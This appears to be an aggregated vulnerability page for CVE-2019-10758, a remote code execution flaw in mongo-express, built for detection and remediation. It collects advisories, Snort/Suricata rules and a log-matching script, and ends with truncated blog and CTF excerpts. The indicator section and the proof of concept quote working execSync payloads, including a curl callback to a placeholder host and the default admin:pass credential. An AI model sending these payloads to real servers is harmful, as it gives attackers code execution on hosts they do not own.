# CVE-2019-10758

Published: 2019-12-24
Priority: P193
Severity: critical, CVSS 3.1 base score 9.9 (vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-06-10
Exploited in the wild
EPSS: 84.84% (99.7th percentile)
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that use the `toBSON` method. The root cause is a misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
## Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mongo-express_project | mongo-express | < 0.54.0 | 0.54.0 |
| mongo-express_project | mongo-express | — | — |
| mongo-express_project | mongo-express | >= 0 < 0.54.0 | 0.54.0 |
## Detection & IOCs (extracted from sources)
Command IoCs (request bodies seen in exploit attempts):

- `document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")`
- `document=this.constructor.constructor("return pr")().mainModule.require("child_process").execSync("id")`

Snort rule:

```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/checkValid"; http.request_body; content:"document=this.constructor"; content:"execSync"; distance:0; fast_pattern; reference:cve,2019-10758; reference:url,github.com/masahiro331/CVE-2019-10758; reference:url,blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; classtype:attempted-admin; sid:2033113; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_10758, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_06_08;)
```
- Exploit attempts target the POST /checkValid endpoint; detect POST requests to this URI path on mongo-express instances.
- The payload body contains the string 'document=this.constructor' combined with 'execSync'; both must be present in the POST body to indicate exploitation.
- Shodan/FOFA fingerprinting: mongo-express instances are identifiable by the HTTP title 'Mongo Express' or 'mongo express', commonly exposed on port 8081.
- The default Basic Auth header 'YWRtaW46cGFzcw==' (admin:pass) is used in exploit attempts against mongo-express; alert on this credential in Authorization headers to /checkValid.
- The vulnerability is exploited through the toBSON method's misuse of the vm dependency; look for child_process.execSync calls originating from the mongo-express process.
- Vulnerable versions are mongo-express before 0.54.0 only; instances running 0.54.0 or higher are not affected.
- The Emerging Threats Snort rule (sid:2033113) is tagged with confidence Medium and deployment Perimeter; tune accordingly for internal/containerized mongo-express deployments.
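The detection notes above can be checked offline against web-server or proxy logs. The following JavaScript is an added example (not code from this page, the Emerging Threats rule set, or the mongo-express project) that mirrors the logic of sid:2033113 over parsed request records: POST to a URI containing `/checkValid`, whose body contains `document=this.constructor` followed by `execSync` (the rule's `distance:0`), with the default Basic Auth credential from the IoC list as a secondary indicator. The `{ method, uri, headers, body }` record shape and the sample records are constructed assumptions; the one matching body is the payload already quoted in the IoC list.

```javascript
// Added example, not from the page or the mongo-express project: a request-record
// matcher that mirrors ET rule sid:2033113 and the IoC notes. The record shape
// { method, uri, headers, body } is an assumption about how logs were parsed.

// Literals the rule and IoC list key on.
const CHECKVALID_PATH = "/checkValid";
const BODY_PREFIX = "document=this.constructor";
const BODY_SUFFIX = "execSync";
const DEFAULT_BASIC_AUTH = "Basic YWRtaW46cGFzcw=="; // admin:pass, per the IoC list

// Equivalent of: http.method POST; http.uri /checkValid; http.request_body
// "document=this.constructor" then "execSync" with distance:0 (i.e. the second
// string must appear after the end of the first match).
function matchesSnortRule(req) {
  if (req.method !== "POST") return false;
  if (!String(req.uri || "").includes(CHECKVALID_PATH)) return false;
  const body = String(req.body || "");
  const start = body.indexOf(BODY_PREFIX);
  if (start < 0) return false;
  return body.indexOf(BODY_SUFFIX, start + BODY_PREFIX.length) >= 0;
}

// Secondary indicator: the default credential presented to /checkValid.
function usesDefaultCredentials(req) {
  const headers = req.headers || {};
  const auth = headers.authorization || headers.Authorization || "";
  return auth === DEFAULT_BASIC_AUTH && String(req.uri || "").includes(CHECKVALID_PATH);
}

// Returns the list of finding labels for one request record.
function classifyRequest(req) {
  const findings = [];
  if (matchesSnortRule(req)) findings.push("cve-2019-10758-checkvalid-rce");
  if (usesDefaultCredentials(req)) findings.push("default-basic-auth-to-checkvalid");
  return findings;
}

// Scans a batch of records and keeps only those with at least one finding.
function scanRequests(requests) {
  return requests
    .map((req, index) => ({ index, uri: req.uri, findings: classifyRequest(req) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample records (not real traffic).
const SAMPLE_REQUESTS = [
  // Benign: ordinary index creation on another route.
  { method: "POST", uri: "/db/test/addIndex", headers: {}, body: "index=%7B%22a%22%3A1%7D" },
  // Benign: GET to the endpoint, no body; the rule requires POST.
  { method: "GET", uri: "/checkValid", headers: {}, body: "" },
  // Matches the rule: payload as quoted in the IoC list, with default credentials.
  {
    method: "POST",
    uri: "/checkValid",
    headers: { authorization: "Basic YWRtaW46cGFzcw==" },
    body: 'document=this.constructor.constructor("return pr")().mainModule.require("child_process").execSync("id")',
  },
  // Both strings present but in the wrong order: fails distance:0, no match.
  { method: "POST", uri: "/checkValid", headers: {}, body: "execSync document=this.constructor" },
];

// Stand-alone run: prints the records that produced findings.
console.log(JSON.stringify(scanRequests(SAMPLE_REQUESTS), null, 2));
```

Because the matcher keys on the same two body substrings as the signature, it inherits the signature's limits: URL-encoding or splitting of `document=this.constructor` in the body would evade it, so treat it as a triage filter over logs rather than a complete detection, and pair it with the process-level indicator from the list above (child_process.execSync spawned by the mongo-express process).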
## CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.9 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| nvd | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| ghsa | n/a | 9.9 | CRITICAL | n/a |
| osv | n/a | 9.9 | CRITICAL | n/a |
| vulncheck | n/a | 9.9 | CRITICAL | n/a |
| cisa | n/a | 9.9 | CRITICAL | n/a |
## OSV: Remote Code Execution Vulnerability in NPM mongo-express

osv · 2019-12-30 · CVSS 9.9 · CVE-2019-10758 [CRITICAL]
### Impact
Remote code execution on the host machine by any authenticated user.
### Proof Of Concept
Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator:
```javascript
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
```
### Patches
Users should upgrade to version `0.54.0`
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [example link to repo](http://example.com)
* Email us at [example email address](mailto:
## GHSA: Remote Code Execution Vulnerability in NPM mongo-express

ghsa · 2019-12-30 · CVSS 9.9 · CVE-2019-10758 [CRITICAL] · CWE-78

The GHSA advisory body (Impact, Proof Of Concept, Patches, Workarounds, For more information) is the same text as the OSV entry above.
## VulnCheck: MongoDB mongo-express Remote Code Execution Vulnerability

vulncheck · 2019 · CVSS 9.9 · CVE-2019-10758 [CRITICAL]

mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that use the `toBSON` method.
Affected: MongoDB mongo-express
Required Action: Apply updates per vendor instructions.
Exploitation References:
- https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpaste-12-spreads-via-github-and-pastebin/#google_vignette
- https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm
- https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence
- https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/
- https://cujo.com/the-sysrv-botnet-and-how-it-evolved/
- https
## CISA: MongoDB mongo-express Remote Code Execution Vulnerability

cisa · 2021-12-10 · CVSS 9.9 · CVE-2019-10758 [CRITICAL]

Vulnerability: MongoDB mongo-express Remote Code Execution Vulnerability
Affected: MongoDB mongo-express
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that use the `toBSON` method.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-10758
Remediation Due Date: 2022-06-10
## Suricata: ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)

suricata · 2021-06-08 · CVSS 9.9 · CVE-2019-10758 [CRITICAL]

Rule:

```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/checkValid"; http.request_body; content:"document=this.constructor"; content:"execSync"; distance:0; fast_pattern; reference:cve,2019-10758; reference:url,github.com/masahiro331/CVE-2019-10758; reference:url,blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; classtype:attempted-admin; sid:2033113; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_10758, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus
```
## Nuclei: mongo-express Remote Code Execution

nuclei · CVSS 9.9 · CVE-2019-10758 [CRITICAL]

mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that use the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.

Template:

```yaml
id: CVE-2019-10758

info:
  name: mongo-express Remote Code Execution
  author: princechaddha
  severity: critical
  description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Upgrade mongo-express to version 0.54.0 or higher.
  reference:
    - https://github.com/vulhub/vulh
```
## Bleepingcomputer: MongoDB warns admins to patch severe vulnerability immediately

blogs_bleepingcomputer · 2025-12-24 · CVSS 9.9 · CVE-2025-14847 [CRITICAL]

By Sergiu Gatlan

Update 12/26/25: Article updated to correct that the flaw has not been officially classified as an RCE.

MongoDB has warned IT admins to immediately patch a high-severity memory-read vulnerability that may be exploited by unauthenticated attackers remotely.

Tracked as CVE-2025-14847, the security flaw affects multiple MongoDB and MongoDB Server versions and may be abused by unauthenticated threat actors in low-complexity attacks that don't require user interaction.

"A client-side exploit of the Server's zlib implementation can return uninitialized heap memory without authenticating to the server. We strongly recommend upgrading to a fixed version as soon as possible," MongoDB's security team said in a
## Qualys: Managing CISA Known Exploited Vulnerabilities with Qualys VMDR

blogs_qualys · 2022-02-23

#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
## CTF: tryhackme-rooms / rocket

ctf_writeups · CVSS 9.8 · [CRITICAL]

# Rocket

https://tryhackme.com/room/rocket

Rated: HARD
This room is a quest, and has many steps before you find the first flag. In fact, the two flags are the final steps of this room, after a lot of work haha.
1. A scan reveals port 22 and 80. On 80 you are redirected to 'rocket.thm', which is a brochureware site. A bit of investigation reveals this to be built with Bolt CMS, which becomes important (much) later.
2. Enumerating sub-domains using ffuf, you can quickly find 'chat.rocket.thm', running an instance of rocket chat. There are a few CVEs for this, in particular CVE-2021-22911 which allows using a nosql injection to recover a password reset token. There is an exploit for this here https://www.exploit-db.com/exploits/49960, however it is slow as hell and requires a few modifica
## Timeline

- 2019-12-24: Published
- 2021-12-10: Added to CISA KEV
- Exploited in the wild